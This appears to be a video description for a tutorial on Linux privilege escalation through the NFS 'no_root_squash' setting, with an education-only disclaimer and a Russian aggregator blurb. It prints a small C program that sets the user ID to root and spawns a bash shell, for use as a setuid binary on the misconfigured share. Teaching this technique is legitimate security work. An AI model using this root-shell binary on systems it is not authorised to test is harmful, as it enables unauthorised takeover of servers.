Have you seen online guides telling you to enable no_root_squash on your NFS server? That may not be the best idea... Here's how to exploit that in order to go from a low privilege shell to a root shell.
This video is for education purposes only. Do not attempt on systems that you do not own.
This video is a re-upload of an older video in order to fix some audio issues.
SHELL USED (You'll have to add the angle brackets, they aren't allows in a description):
#include stdio.h
#include stdlib.h
#include sys/types.h
#include unistd.h
int main(){
setuid(0);
system("/bin/bash");
return 0;
}
Here is a great write up on this, and where the C shell came from:
https://www.securitynewspaper.com/201...
Follow me on Twitter: / 0xconda
If you found this video helpful and would like to support future creations, please considering visiting the following links:
Patreon: / conda
Buy Me a Coffee: https://www.buymeacoffee.com/conda
Смотрите видео Common Linux Privilege Escalation: NFS no_root_squash онлайн без регистрации, длительностью часов минут секунд в хорошем качестве. Это видео добавил пользователь Conda 14 Сентябрь 2020, не забудьте поделиться им ссылкой с друзьями и знакомыми, на нашем сайте его посмотрели 11,202 раз и оно понравилось 197 людям.